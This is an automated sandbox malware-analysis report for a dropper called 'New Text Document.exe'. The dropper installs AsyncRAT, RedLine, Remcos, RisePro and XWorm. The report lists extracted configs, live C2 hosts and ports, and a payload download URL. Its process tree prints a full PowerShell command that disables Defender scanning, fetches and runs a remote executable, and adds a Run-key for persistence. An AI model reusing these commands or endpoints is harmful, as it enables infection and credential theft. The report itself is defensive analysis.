asyncrat | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Resubmissions

09-04-2024 13:27

240409-qqa5hsbd5t 10

09-04-2024 13:27

09-04-2024 13:27

09-04-2024 13:27

18-11-2023 14:44

Analysis

max time kernel
91s
max time network
269s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09-04-2024 13:27

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score

10^/10

asyncrat redline remcos risepro xworm 6077866846 remotehost discovery evasion infostealer persistence rat spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Family

redline

Botnet

6077866846

https://pastebin.com/raw/KE5Mft0T

Extracted

Family

remcos

Botnet

RemoteHost

shgoini.com:30902

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7XHN5V
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

xworm

94.156.8.213:58002

127.0.0.1:18356

t-brave.gl.at.ply.gg:18356

Attributes

Install_directory
%Public%
install_file
svchost.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe	family_xworm

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4380-58-0x0000000001210000-0x0000000001232000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

mQxBvlTA.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mQxBvlTA.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mQxBvlTA.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mQxBvlTA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mQxBvlTA.exe

Drops startup file 1 IoCs

Processes:

word.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.vbs word.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.vbs	word.exe

Executes dropped EXE 31 IoCs

Processes:

cccc.exemQxBvlTA.exexIPJVPDq.exelHxisYyn.execrypted6077866846MVYQY.exei1gcbW1E.exewininit.exeword.exeword.exe1234.exeISetup8.exetest2.exeu3t0.0.exe1111.exeu3t0.1.exeISetup2.exeTester.exesvchost.exe555.exeDocument.exeBrawlB0t.exeRuntimeBroker2.exemedcallaboratory5.exesvchost.exesecuritycheck.exeDocument.exeDocument.exePrintSpoofer.exeAdobe_update.exeRetailer_prog.exemsdtc.exe

pid	process
4780	cccc.exe
524	mQxBvlTA.exe
200	xIPJVPDq.exe
4616	lHxisYyn.exe
4380	crypted6077866846MVYQY.exe
1524	i1gcbW1E.exe
1528	wininit.exe
1416	word.exe
3324	word.exe
1996	1234.exe
4932	ISetup8.exe
4832	test2.exe
3300	u3t0.0.exe
2672	1111.exe
1728	u3t0.1.exe
5104	ISetup2.exe
1624	Tester.exe
2820	svchost.exe
5064	555.exe
3988	Document.exe
1580	BrawlB0t.exe
4856	RuntimeBroker2.exe
280	medcallaboratory5.exe
1356	svchost.exe
3320	securitycheck.exe
4820	Document.exe
4372	Document.exe
2724	PrintSpoofer.exe
3748	Adobe_update.exe
5956	Retailer_prog.exe
5980	msdtc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe	themida
behavioral2/memory/524-75-0x0000000001210000-0x000000000232C000-memory.dmp	themida
behavioral2/memory/524-78-0x0000000001210000-0x000000000232C000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2768987046-1485460554-1347040953-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

mQxBvlTA.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

20 pastebin.com
12 raw.githubusercontent.com
13 raw.githubusercontent.com
19 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

80 ip-api.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mQxBvlTA.exe

flow	ioc
20	pastebin.com
12	raw.githubusercontent.com
13	raw.githubusercontent.com
19	pastebin.com

flow	ioc
80	ip-api.com

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe	autoit_exe
C:\Users\Admin\AppData\Local\directory\word.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

mQxBvlTA.exe

pid process

524 mQxBvlTA.exe

pid	process
524	mQxBvlTA.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

word.exemedcallaboratory5.exeDocument.exeAdobe_update.exe

description	pid	process	target process
PID 3324 set thread context of 568	3324	word.exe	svchost.exe
PID 280 set thread context of 4752	280	medcallaboratory5.exe	RegSvcs.exe
PID 3988 set thread context of 4372	3988	Document.exe	Document.exe
PID 3748 set thread context of 1080	3748	Adobe_update.exe	RegAsm.exe

Drops file in Windows directory 2 IoCs

Processes:

Tester.exe

description ioc process

File created C:\Windows\svchost.exe Tester.exe
File opened for modification C:\Windows\svchost.exe Tester.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\svchost.exe	Tester.exe
File opened for modification	C:\Windows\svchost.exe	Tester.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2204	3748	WerFault.exe	Adobe_update.exe
5408	4088	WerFault.exe	1111.exe
5540	5360	WerFault.exe	crypted_097f1784.exe
5676	4124	WerFault.exe	crypted_33cb9091.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

u3t0.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3t0.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3t0.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3t0.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

u3t0.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u3t0.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u3t0.0.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2056 schtasks.exe
5056 schtasks.exe
5652 schtasks.exe
5524 schtasks.exe
2296 schtasks.exe
5400 schtasks.exe
2164 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5024 timeout.exe
5712 timeout.exe

pid	process
2056	schtasks.exe
5056	schtasks.exe
5652	schtasks.exe
5524	schtasks.exe
2296	schtasks.exe
5400	schtasks.exe
2164	schtasks.exe

pid	process
5024	timeout.exe
5712	timeout.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5340 PING.EXE

pid	process
5340	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

cccc.exepowershell.exexIPJVPDq.exelHxisYyn.execrypted6077866846MVYQY.exeu3t0.0.exepowershell.exeTester.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exe

pid	process
4780	cccc.exe
2180	powershell.exe
200	xIPJVPDq.exe
200	xIPJVPDq.exe
200	xIPJVPDq.exe
200	xIPJVPDq.exe
4616	lHxisYyn.exe
4616	lHxisYyn.exe
4616	lHxisYyn.exe
4616	lHxisYyn.exe
4380	crypted6077866846MVYQY.exe
2180	powershell.exe
2180	powershell.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
4380	crypted6077866846MVYQY.exe
3300	u3t0.0.exe
3300	u3t0.0.exe
3296	powershell.exe
3296	powershell.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
3296	powershell.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
1624	Tester.exe
3296	powershell.exe
2820	svchost.exe
2820	svchost.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
4796	powershell.exe
4796	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
4752	RegSvcs.exe
4752	RegSvcs.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

word.exeword.exemedcallaboratory5.exe

pid process

1416 word.exe
3324 word.exe
280 medcallaboratory5.exe

pid	process
1416	word.exe
3324	word.exe
280	medcallaboratory5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document.execccc.exexIPJVPDq.exepowershell.exelHxisYyn.execrypted6077866846MVYQY.exemQxBvlTA.exeTester.exepowershell.exesvchost.exevssvc.exepowershell.exepowershell.exepowershell.exeBrawlB0t.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	3352	New Text Document.exe
Token: SeDebugPrivilege	4780	cccc.exe
Token: SeDebugPrivilege	200	xIPJVPDq.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	4616	lHxisYyn.exe
Token: SeDebugPrivilege	4380	crypted6077866846MVYQY.exe
Token: SeDebugPrivilege	524	mQxBvlTA.exe
Token: SeDebugPrivilege	1624	Tester.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	2820	svchost.exe
Token: SeBackupPrivilege	1808	vssvc.exe
Token: SeRestorePrivilege	1808	vssvc.exe
Token: SeAuditPrivilege	1808	vssvc.exe
Token: SeDebugPrivilege	2820	svchost.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeIncreaseQuotaPrivilege	3200	powershell.exe
Token: SeSecurityPrivilege	3200	powershell.exe
Token: SeTakeOwnershipPrivilege	3200	powershell.exe
Token: SeLoadDriverPrivilege	3200	powershell.exe
Token: SeSystemProfilePrivilege	3200	powershell.exe
Token: SeSystemtimePrivilege	3200	powershell.exe
Token: SeProfSingleProcessPrivilege	3200	powershell.exe
Token: SeIncBasePriorityPrivilege	3200	powershell.exe
Token: SeCreatePagefilePrivilege	3200	powershell.exe
Token: SeBackupPrivilege	3200	powershell.exe
Token: SeRestorePrivilege	3200	powershell.exe
Token: SeShutdownPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeSystemEnvironmentPrivilege	3200	powershell.exe
Token: SeRemoteShutdownPrivilege	3200	powershell.exe
Token: SeUndockPrivilege	3200	powershell.exe
Token: SeManageVolumePrivilege	3200	powershell.exe
Token: 33	3200	powershell.exe
Token: 34	3200	powershell.exe
Token: 35	3200	powershell.exe
Token: 36	3200	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	1580	BrawlB0t.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeIncreaseQuotaPrivilege	4724	powershell.exe
Token: SeSecurityPrivilege	4724	powershell.exe
Token: SeTakeOwnershipPrivilege	4724	powershell.exe
Token: SeLoadDriverPrivilege	4724	powershell.exe
Token: SeSystemProfilePrivilege	4724	powershell.exe
Token: SeSystemtimePrivilege	4724	powershell.exe
Token: SeProfSingleProcessPrivilege	4724	powershell.exe
Token: SeIncBasePriorityPrivilege	4724	powershell.exe
Token: SeCreatePagefilePrivilege	4724	powershell.exe
Token: SeBackupPrivilege	4724	powershell.exe
Token: SeRestorePrivilege	4724	powershell.exe
Token: SeShutdownPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeSystemEnvironmentPrivilege	4724	powershell.exe
Token: SeRemoteShutdownPrivilege	4724	powershell.exe
Token: SeUndockPrivilege	4724	powershell.exe
Token: SeManageVolumePrivilege	4724	powershell.exe
Token: 33	4724	powershell.exe
Token: 34	4724	powershell.exe
Token: 35	4724	powershell.exe
Token: 36	4724	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	4752	RegSvcs.exe
Token: SeIncreaseQuotaPrivilege	4824	powershell.exe

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

wininit.exeword.exeword.exeu3t0.1.exemedcallaboratory5.exe

pid	process
1528	wininit.exe
1528	wininit.exe
1416	word.exe
1416	word.exe
3324	word.exe
3324	word.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
280	medcallaboratory5.exe
280	medcallaboratory5.exe

Suspicious use of SendNotifyMessage 15 IoCs

Processes:

wininit.exeword.exeword.exeu3t0.1.exemedcallaboratory5.exe

pid	process
1528	wininit.exe
1528	wininit.exe
1416	word.exe
1416	word.exe
3324	word.exe
3324	word.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
1728	u3t0.1.exe
280	medcallaboratory5.exe
280	medcallaboratory5.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

2820 svchost.exe

pid	process
2820	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document.execccc.execmd.exexIPJVPDq.exewininit.exeword.exeword.exeISetup8.exepowershell.exe

description	pid	process	target process
PID 3352 wrote to memory of 4780	3352	New Text Document.exe	cccc.exe
PID 3352 wrote to memory of 4780	3352	New Text Document.exe	cccc.exe
PID 3352 wrote to memory of 4780	3352	New Text Document.exe	cccc.exe
PID 4780 wrote to memory of 4532	4780	cccc.exe	cmd.exe
PID 4780 wrote to memory of 4532	4780	cccc.exe	cmd.exe
PID 4780 wrote to memory of 4532	4780	cccc.exe	cmd.exe
PID 4532 wrote to memory of 2180	4532	cmd.exe	powershell.exe
PID 4532 wrote to memory of 2180	4532	cmd.exe	powershell.exe
PID 4532 wrote to memory of 2180	4532	cmd.exe	powershell.exe
PID 3352 wrote to memory of 524	3352	New Text Document.exe	mQxBvlTA.exe
PID 3352 wrote to memory of 524	3352	New Text Document.exe	mQxBvlTA.exe
PID 3352 wrote to memory of 524	3352	New Text Document.exe	mQxBvlTA.exe
PID 3352 wrote to memory of 200	3352	New Text Document.exe	xIPJVPDq.exe
PID 3352 wrote to memory of 200	3352	New Text Document.exe	xIPJVPDq.exe
PID 3352 wrote to memory of 200	3352	New Text Document.exe	xIPJVPDq.exe
PID 200 wrote to memory of 4616	200	xIPJVPDq.exe	lHxisYyn.exe
PID 200 wrote to memory of 4616	200	xIPJVPDq.exe	lHxisYyn.exe
PID 3352 wrote to memory of 4380	3352	New Text Document.exe	crypted6077866846MVYQY.exe
PID 3352 wrote to memory of 4380	3352	New Text Document.exe	crypted6077866846MVYQY.exe
PID 3352 wrote to memory of 4380	3352	New Text Document.exe	crypted6077866846MVYQY.exe
PID 3352 wrote to memory of 1524	3352	New Text Document.exe	i1gcbW1E.exe
PID 3352 wrote to memory of 1524	3352	New Text Document.exe	i1gcbW1E.exe
PID 3352 wrote to memory of 1528	3352	New Text Document.exe	wininit.exe
PID 3352 wrote to memory of 1528	3352	New Text Document.exe	wininit.exe
PID 3352 wrote to memory of 1528	3352	New Text Document.exe	wininit.exe
PID 1528 wrote to memory of 1416	1528	wininit.exe	word.exe
PID 1528 wrote to memory of 1416	1528	wininit.exe	word.exe
PID 1528 wrote to memory of 1416	1528	wininit.exe	word.exe
PID 1416 wrote to memory of 1352	1416	word.exe	svchost.exe
PID 1416 wrote to memory of 1352	1416	word.exe	svchost.exe
PID 1416 wrote to memory of 1352	1416	word.exe	svchost.exe
PID 1416 wrote to memory of 3324	1416	word.exe	word.exe
PID 1416 wrote to memory of 3324	1416	word.exe	word.exe
PID 1416 wrote to memory of 3324	1416	word.exe	word.exe
PID 3324 wrote to memory of 568	3324	word.exe	svchost.exe
PID 3324 wrote to memory of 568	3324	word.exe	svchost.exe
PID 3324 wrote to memory of 568	3324	word.exe	svchost.exe
PID 3324 wrote to memory of 568	3324	word.exe	svchost.exe
PID 3352 wrote to memory of 1996	3352	New Text Document.exe	1234.exe
PID 3352 wrote to memory of 1996	3352	New Text Document.exe	1234.exe
PID 3352 wrote to memory of 1996	3352	New Text Document.exe	1234.exe
PID 3352 wrote to memory of 4932	3352	New Text Document.exe	ISetup8.exe
PID 3352 wrote to memory of 4932	3352	New Text Document.exe	ISetup8.exe
PID 3352 wrote to memory of 4932	3352	New Text Document.exe	ISetup8.exe
PID 3352 wrote to memory of 4832	3352	New Text Document.exe	test2.exe
PID 3352 wrote to memory of 4832	3352	New Text Document.exe	test2.exe
PID 4932 wrote to memory of 3300	4932	ISetup8.exe	u3t0.0.exe
PID 4932 wrote to memory of 3300	4932	ISetup8.exe	u3t0.0.exe
PID 4932 wrote to memory of 3300	4932	ISetup8.exe	u3t0.0.exe
PID 3352 wrote to memory of 2672	3352	New Text Document.exe	1111.exe
PID 3352 wrote to memory of 2672	3352	New Text Document.exe	1111.exe
PID 3352 wrote to memory of 5104	3352	New Text Document.exe	ISetup2.exe
PID 3352 wrote to memory of 5104	3352	New Text Document.exe	ISetup2.exe
PID 3352 wrote to memory of 5104	3352	New Text Document.exe	ISetup2.exe
PID 4932 wrote to memory of 1728	4932	ISetup8.exe	u3t0.1.exe
PID 4932 wrote to memory of 1728	4932	ISetup8.exe	u3t0.1.exe
PID 4932 wrote to memory of 1728	4932	ISetup8.exe	u3t0.1.exe
PID 2180 wrote to memory of 3296	2180	powershell.exe	powershell.exe
PID 2180 wrote to memory of 3296	2180	powershell.exe	powershell.exe
PID 2180 wrote to memory of 3296	2180	powershell.exe	powershell.exe
PID 3352 wrote to memory of 1624	3352	New Text Document.exe	Tester.exe
PID 3352 wrote to memory of 1624	3352	New Text Document.exe	Tester.exe
PID 3352 wrote to memory of 2820	3352	New Text Document.exe	svchost.exe
PID 3352 wrote to memory of 2820	3352	New Text Document.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352

C:\Users\Admin\AppData\Local\Temp\a\cccc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
3⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" /t 1
5⤵
- Delays execution with timeout.exe
PID:5024

C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
5⤵
- Executes dropped EXE
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2' -Value '"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"' -PropertyType 'String'
6⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe
"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe
"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
